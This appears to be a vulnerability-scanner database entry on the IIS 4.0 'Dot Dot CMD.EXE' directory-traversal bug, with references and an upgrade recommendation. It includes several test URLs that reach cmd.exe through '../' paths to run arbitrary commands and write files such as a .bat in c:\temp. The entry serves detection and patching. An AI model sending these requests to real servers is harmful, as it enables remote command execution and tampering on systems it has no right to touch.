| VID |
22033 |
| Severity |
40 |
| Port |
80, ... |
| Protocol |
TCP |
| Class |
WWW |
| Detailed Description |
There is "Dot Dot CMD.EXE" bug as an older version bug of IIS 4.0. The corresponding server has vulnerability of being able to execute a random command within the server from the outside using this bug. This can be tested if performed as follows.
http://[domain_name]/scripts/../../cmd.exe/?%2FC+any_command
or, http://[domain_name]/scripts/../../cmd.exe/?%2FC+any_command>FULL_PATH\filename
or,
http://[domain_name]/scripts/../../cmd.exe/?%2FC+any_command>>FULL_PATH\filename
or,
http://[domain_name]/scripts/../../cmd.exe/?%2FC+echo+"hello,+World">c:\temp\hello.bat |
| Recommendation |
Stop the system immediately, and Install latest version. |
| Related URL |
CVE-1999-0874 (CVE) |
| Related URL |
307 (SecurityFocus) |
| Related URL |
2281 (ISS) |
|
